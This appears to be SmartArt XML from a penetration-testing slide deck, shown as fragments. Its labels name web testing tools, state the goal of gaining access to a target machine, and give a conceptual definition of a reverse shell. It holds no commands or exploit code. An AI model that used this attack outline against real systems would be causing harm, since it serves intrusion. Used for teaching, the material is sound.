    </dgm:pt>
    <dgm:pt modelId="{C0393543-5404-4C4C-A586-B2B0AFA9E641}" type="parTrans" cxnId="{32936311-C067-4706-9D20-44F32168AFC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{542FFE94-77E9-451E-B0DC-7306B057DE5E}" type="sibTrans" cxnId="{32936311-C067-4706-9D20-44F32168AFC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38FB2DC0-72F3-46F4-A022-1A8A616E0FF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Burp Suite, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Nikto</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>, Zed Attack Proxy,  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Dirb</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>, etc.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FCE32FA-3994-42B3-A26F-269599147605}" type="parTrans" cxnId="{14125258-D160-44F2-B2EE-E72B11171A1D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{115629DE-972F-4DDE-9E65-3F8FF61ABCE3}" type="sibTrans" cxnId="{14125258-D160-44F2-B2EE-E72B11171A1D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{615E33B8-3DB5-4928-BFB1-788122F12516}" type="pres">
      <dgm:prSet presAssocID="{3173193B-6909-48AD-8DB1-4A2285ABEA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DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD639958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4CECC-1F65-4099-A139-F4D80312019E}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD639958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79018-FAF9-4701-AC22-05A56FA03478}" type="pres">
      <dgm:prSet presAssocID="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E3BBED26-8D7D-44AA-B81E-AC9609C7827F}" type="pres">
      <dgm:prSet presAssocID="{53D818AB-1274-47A2-8F42-3B19A67F4AD2}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{102BBF15-4727-4393-AF3A-5C93A7FE827C}" type="pres">
      <dgm:prSet presAssocID="{53D818AB-1274-47A2-8F42-3B19A67F4AD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2CD4B-47CA-4483-A9EE-76E37B1CB79F}" type="pres">
      <dgm:prSet presAssocID="{53D818AB-1274-47A2-8F42-3B19A67F4AD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322C1-DAC0-447C-B28C-7AF5638F7A1C}" type="pres">
      <dgm:prSet presAssocID="{C68CD992-9615-4778-9DBF-9ABC886AEBD8}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{600201FC-05FB-4445-9137-BA0D9ED9EF9E}" type="pres">
      <dgm:prSet presAssocID="{0F544C4B-F022-4F64-A4B9-C5A0146738D7}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CDD1640-CB18-4897-9DEB-AB94F5729236}" type="pres">
      <dgm:prSet presAssocID="{0F544C4B-F022-4F64-A4B9-C5A0146738D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35DA2-F571-406E-8673-FDB4FEC56E12}" type="pres">
      <dgm:prSet presAssocID="{0F544C4B-F022-4F64-A4B9-C5A0146738D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07DB5D-BDBF-4A51-9E49-B95828A31887}" type="presOf" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{32936311-C067-4706-9D20-44F32168AFC0}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{0F544C4B-F022-4F64-A4B9-C5A0146738D7}" srcOrd="2" destOrd="0" parTransId="{C0393543-5404-4C4C-A586-B2B0AFA9E641}" sibTransId="{542FFE94-77E9-451E-B0DC-7306B057DE5E}"/>
    <dgm:cxn modelId="{14125258-D160-44F2-B2EE-E72B11171A1D}" srcId="{0F544C4B-F022-4F64-A4B9-C5A0146738D7}" destId="{38FB2DC0-72F3-46F4-A022-1A8A616E0FF7}" srcOrd="0" destOrd="0" parTransId="{5FCE32FA-3994-42B3-A26F-269599147605}" sibTransId="{115629DE-972F-4DDE-9E65-3F8FF61ABCE3}"/>
    <dgm:cxn modelId="{E49A2BBB-2595-4757-A0C2-A25890C4933B}" type="presOf" srcId="{F2F239BE-11C7-45FD-A69B-155E4F346977}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{905D1A78-FEBC-4921-8199-BC9C8F31A4E9}" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{F2F239BE-11C7-45FD-A69B-155E4F346977}" srcOrd="0" destOrd="0" parTransId="{7AC01C8E-2045-4D9A-9390-5BA38ABDBAE2}" sibTransId="{AE4CF2F4-21DA-42CC-AD5F-CC37A168799F}"/>
    <dgm:cxn modelId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" srcOrd="0" destOrd="0" parTransId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" sibTransId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}"/>
    <dgm:cxn modelId="{E901712E-2E3F-48C8-B199-832E1D2CBAD3}" type="presOf" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{615E33B8-3DB5-4928-BFB1-788122F12516}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B357D06D-B425-4698-AB86-D48E678B7055}" type="presOf" srcId="{4962F4D0-8B60-497C-9236-01B5A4B3F378}" destId="{2942CD4B-47CA-4483-A9EE-76E37B1CB79F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5CA1D828-C8EA-49EC-91CB-E966913A7C4F}" srcId="{53D818AB-1274-47A2-8F42-3B19A67F4AD2}" destId="{4962F4D0-8B60-497C-9236-01B5A4B3F378}" srcOrd="0" destOrd="0" parTransId="{5CE9945A-82D7-48F1-9D68-345CD4E9AF0C}" sibTransId="{CD382A61-1D4A-438C-BF29-CD01FC83DAF7}"/>
    <dgm:cxn modelId="{FB3A7719-09C7-4DB9-B7FB-69F5B5B77029}" type="presOf" srcId="{53D818AB-1274-47A2-8F42-3B19A67F4AD2}" destId="{102BBF15-4727-4393-AF3A-5C93A7FE827C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{933C510D-422A-4507-A975-3761F3230DE2}" type="presOf" srcId="{38FB2DC0-72F3-46F4-A022-1A8A616E0FF7}" destId="{73735DA2-F571-406E-8673-FDB4FEC56E12}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FF2FA41A-6056-4C5E-B894-042F95091F1E}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{53D818AB-1274-47A2-8F42-3B19A67F4AD2}" srcOrd="1" destOrd="0" parTransId="{F1E8FC57-6346-4D30-9941-C52A4C5A6850}" sibTransId="{C68CD992-9615-4778-9DBF-9ABC886AEBD8}"/>
    <dgm:cxn modelId="{C7A34AB8-E27E-42EE-9877-67B218365B97}" type="presOf" srcId="{0F544C4B-F022-4F64-A4B9-C5A0146738D7}" destId="{6CDD1640-CB18-4897-9DEB-AB94F5729236}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AAE901C1-6B8F-48C0-A1D4-CB34FB86AD61}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0161534A-7CEF-4377-9B36-5E983CCE42E8}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EF20EFDA-6B21-4966-B693-A4B715513250}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FDA87ACB-7AA8-4F98-A515-C728C7402F71}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{7E779018-FAF9-4701-AC22-05A56FA03478}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9446E17E-8477-43DC-A577-3A978D3F75D2}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{E3BBED26-8D7D-44AA-B81E-AC9609C7827F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{793AA740-3193-481C-A609-A84138F506A8}" type="presParOf" srcId="{E3BBED26-8D7D-44AA-B81E-AC9609C7827F}" destId="{102BBF15-4727-4393-AF3A-5C93A7FE827C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1DFC4FF9-C3BE-4117-A9E7-82924036823D}" type="presParOf" srcId="{E3BBED26-8D7D-44AA-B81E-AC9609C7827F}" destId="{2942CD4B-47CA-4483-A9EE-76E37B1CB79F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{54AE648D-B0CD-4BE6-87D4-F50FCBBE45D3}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{33F322C1-DAC0-447C-B28C-7AF5638F7A1C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B0EB7C32-64B5-454F-AFAA-1ECDEE0EC277}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{600201FC-05FB-4445-9137-BA0D9ED9EF9E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{95CC1E41-D43D-481A-9D48-1021D6BDD5B6}" type="presParOf" srcId="{600201FC-05FB-4445-9137-BA0D9ED9EF9E}" destId="{6CDD1640-CB18-4897-9DEB-AB94F5729236}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4D1975F5-78A5-44DA-B001-7DC4282CE426}" type="presParOf" srcId="{600201FC-05FB-4445-9137-BA0D9ED9EF9E}" destId="{73735DA2-F571-406E-8673-FDB4FEC56E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73193B-6909-48AD-8DB1-4A2285ABEA4D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="Inbox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B2E5388-BAAA-4012-BA1D-E5BFD6399588}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Goal</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" type="parTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" type="sibTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DC38EA7-E458-47E8-8910-BCB3E4266860}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Obtain access to the target machine or be able to manipulate it in a way the attacker intends to</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{547325A9-8CD7-4D54-818C-E19AC95008A6}" type="parTrans" cxnId="{9E6DBA08-5F06-489D-974A-3DE55CD3EE2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{333AE924-BB7F-4B25-8996-58873D1DE4F3}" type="sibTrans" cxnId="{9E6DBA08-5F06-489D-974A-3DE55CD3EE2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6C035A9-F347-4C5A-B58A-CA32A490F40E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Method</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BB60BDC-B9E2-4D48-B18A-DAB09AFDD5E4}" type="parTrans" cxnId="{87C9B567-0D98-4A44-9873-FFD2041A9E15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{837B6788-67AE-4817-A7FD-3D4DD5748D28}" type="sibTrans" cxnId="{87C9B567-0D98-4A44-9873-FFD2041A9E15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0CF59E9-9DA3-4391-89E8-66C68E8DAB2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Further enumeration of newly accessed resources</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64293C07-CF72-4874-9DB7-9D9BAD1EE8B0}" type="parTrans" cxnId="{34F7ECB1-950A-4632-84EF-63F8D370794E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD9294FB-D232-4BA2-B250-70E17CDC9760}" type="sibTrans" cxnId="{34F7ECB1-950A-4632-84EF-63F8D370794E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{615E33B8-3DB5-4928-BFB1-788122F12516}" type="pres">
      <dgm:prSet presAssocID="{3173193B-6909-48AD-8DB1-4A2285ABEA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DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588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4CECC-1F65-4099-A139-F4D80312019E}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588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79018-FAF9-4701-AC22-05A56FA03478}" type="pres">
      <dgm:prSet presAssocID="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F51659EE-8E47-4E1F-BD31-63F578ADC72F}" type="pres">
      <dgm:prSet presAssocID="{C6C035A9-F347-4C5A-B58A-CA32A490F40E}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78AEF0B4-BBB7-4AE1-BACD-25EAED873C2D}" type="pres">
      <dgm:prSet presAssocID="{C6C035A9-F347-4C5A-B58A-CA32A490F40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1AE5B-A95F-4B03-BFFF-E9B5460A950D}" type="pres">
      <dgm:prSet presAssocID="{C6C035A9-F347-4C5A-B58A-CA32A490F40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07DB5D-BDBF-4A51-9E49-B95828A31887}" type="presOf" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F448B460-A879-4671-8179-0B76053F123B}" type="presOf" srcId="{D0CF59E9-9DA3-4391-89E8-66C68E8DAB2D}" destId="{B1F1AE5B-A95F-4B03-BFFF-E9B5460A950D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9E6DBA08-5F06-489D-974A-3DE55CD3EE2D}" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{3DC38EA7-E458-47E8-8910-BCB3E4266860}" srcOrd="0" destOrd="0" parTransId="{547325A9-8CD7-4D54-818C-E19AC95008A6}" sibTransId="{333AE924-BB7F-4B25-8996-58873D1DE4F3}"/>
    <dgm:cxn modelId="{34F7ECB1-950A-4632-84EF-63F8D370794E}" srcId="{C6C035A9-F347-4C5A-B58A-CA32A490F40E}" destId="{D0CF59E9-9DA3-4391-89E8-66C68E8DAB2D}" srcOrd="0" destOrd="0" parTransId="{64293C07-CF72-4874-9DB7-9D9BAD1EE8B0}" sibTransId="{FD9294FB-D232-4BA2-B250-70E17CDC9760}"/>
    <dgm:cxn modelId="{B78DE4D8-D070-487E-A55B-D19D64314174}" type="presOf" srcId="{3DC38EA7-E458-47E8-8910-BCB3E4266860}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" srcOrd="0" destOrd="0" parTransId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" sibTransId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}"/>
    <dgm:cxn modelId="{E901712E-2E3F-48C8-B199-832E1D2CBAD3}" type="presOf" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{615E33B8-3DB5-4928-BFB1-788122F12516}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{87C9B567-0D98-4A44-9873-FFD2041A9E15}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{C6C035A9-F347-4C5A-B58A-CA32A490F40E}" srcOrd="1" destOrd="0" parTransId="{2BB60BDC-B9E2-4D48-B18A-DAB09AFDD5E4}" sibTransId="{837B6788-67AE-4817-A7FD-3D4DD5748D28}"/>
    <dgm:cxn modelId="{077DEAB4-403C-417C-B63C-DB26CD54268A}" type="presOf" srcId="{C6C035A9-F347-4C5A-B58A-CA32A490F40E}" destId="{78AEF0B4-BBB7-4AE1-BACD-25EAED873C2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AAE901C1-6B8F-48C0-A1D4-CB34FB86AD61}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0161534A-7CEF-4377-9B36-5E983CCE42E8}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EF20EFDA-6B21-4966-B693-A4B715513250}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FDA87ACB-7AA8-4F98-A515-C728C7402F71}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{7E779018-FAF9-4701-AC22-05A56FA03478}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8311C323-8789-4682-8784-BB24E9A289FF}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{F51659EE-8E47-4E1F-BD31-63F578ADC72F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BE56EF90-A610-4C21-BB13-3E2003E0D126}" type="presParOf" srcId="{F51659EE-8E47-4E1F-BD31-63F578ADC72F}" destId="{78AEF0B4-BBB7-4AE1-BACD-25EAED873C2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{575BACE7-609C-4CBA-B149-0F0E420FA06D}" type="presParOf" srcId="{F51659EE-8E47-4E1F-BD31-63F578ADC72F}" destId="{B1F1AE5B-A95F-4B03-BFFF-E9B5460A950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8A1B2B-ABD2-4694-BB6A-B3E03F0FDB40}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1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1B3475-4450-4CEA-B932-3B7534E4ED23}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
            <a:t>Introducing malicious code to the system</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B607031-E0B0-4200-A697-C31D8B71F7A6}" type="parTrans" cxnId="{3E35DC50-8CEE-4669-B5AB-ED3750AA90EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57FC9E2D-A218-4D05-800C-22451432C647}" type="sibTrans" cxnId="{3E35DC50-8CEE-4669-B5AB-ED3750AA90EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C929937D-7E48-4013-92A6-94D9B671FAB0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            <a:t>Reverse shell </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0"/>
            <a:t>-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0"/>
            <a:t>Type of shell where the target machine communicates back to the attacking machine. The attacking machine sets up a listener on a port to receive that communication from the target machine.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91D6C797-9494-453B-AE0D-241ABD677BF6}" type="parTrans" cxnId="{C4000DC4-05EF-41EC-8BEA-B82FA59D1F60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E843FC0-4194-4EDD-8B71-F9652963F38D}" type="sibTrans" cxnId="{C4000DC4-05EF-41EC-8BEA-B82FA59D1F60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D160832-694B-42A6-81F1-B204BBC82AD1}" type="pres">
      <dgm:prSet presAssocID="{2E8A1B2B-ABD2-4694-BB6A-B3E03F0FDB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BF9FE7-AFE6-4CD9-A0BE-A52453C9F3B7}" type="pres">
      <dgm:prSet presAssocID="{831B3475-4450-4CEA-B932-3B7534E4ED23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0AE17-5F7C-403C-96B0-EB46CF7A9B0B}" type="pres">
      <dgm:prSet presAssocID="{57FC9E2D-A218-4D05-800C-22451432C647}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{623FEE27-2C37-45F3-A3AF-6C0068388104}" type="pres">
      <dgm:prSet presAssocID="{C929937D-7E48-4013-92A6-94D9B671FAB0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11E1EF-914D-4956-9763-B01C6EC19761}" type="presOf" srcId="{C929937D-7E48-4013-92A6-94D9B671FAB0}" destId="{623FEE27-2C37-45F3-A3AF-6C0068388104}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{3E35DC50-8CEE-4669-B5AB-ED3750AA90EC}" srcId="{2E8A1B2B-ABD2-4694-BB6A-B3E03F0FDB40}" destId="{831B3475-4450-4CEA-B932-3B7534E4ED23}" srcOrd="0" destOrd="0" parTransId="{6B607031-E0B0-4200-A697-C31D8B71F7A6}" sibTransId="{57FC9E2D-A218-4D05-800C-22451432C647}"/>
    <dgm:cxn modelId="{BE998CF7-51A8-439E-B747-A066737D6174}" type="presOf" srcId="{2E8A1B2B-ABD2-4694-BB6A-B3E03F0FDB40}" destId="{6D160832-694B-42A6-81F1-B204BBC82AD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
